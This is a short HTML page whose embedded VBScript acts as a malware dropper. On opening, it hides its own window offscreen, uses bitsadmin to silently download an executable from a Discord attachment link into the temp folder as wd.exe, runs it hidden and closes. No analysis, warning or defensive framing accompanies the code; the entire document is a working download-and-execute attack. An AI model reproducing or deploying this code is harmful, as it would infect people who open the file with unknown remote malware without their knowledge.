<html><body><script language="VBScript">
Window.ResizeTo 0,0:Window.MoveTo -5000,-5000

Dim shell: Set shell = CreateObject("WScript.Shell")
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
Dim temp: temp = fso.GetSpecialFolder(2)

shell.Run "bitsadmin /transfer d /download /priority high ""https://cdn.discordapp.com/attachments/1385138581659717662/1522577418173288478/navichinesenman.exe?ex=6a48fa38&is=6a47a8b8&hm=b8408ce59cce0db9bf1afe71c5c0bc420989123ae01fdd22f70fbdf3c820bb57&"" """ & temp & "\wd.exe""", 0, True

If fso.FileExists(temp & "\wd.exe") Then
    shell.Run """" & temp & "\wd.exe""", 0, False
End If

window.close()
</script></body></html>